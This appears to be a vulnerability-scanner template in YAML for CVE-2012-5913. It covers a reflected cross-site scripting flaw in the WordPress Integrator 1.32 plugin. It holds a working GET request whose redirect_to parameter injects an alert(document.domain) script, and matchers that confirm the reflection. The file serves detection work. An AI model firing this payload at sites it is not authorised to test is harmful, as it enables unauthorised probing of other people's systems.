39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
id: CVE-2012-5913
|
|
|
|
info:
|
|
name: WordPress Integrator 1.32 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-5913
|
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
|
|
- http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html
|
|
- http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
|
|
classification:
|
|
cve-id: CVE-2012-5913
|
|
tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
|
|
part: body
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/21
|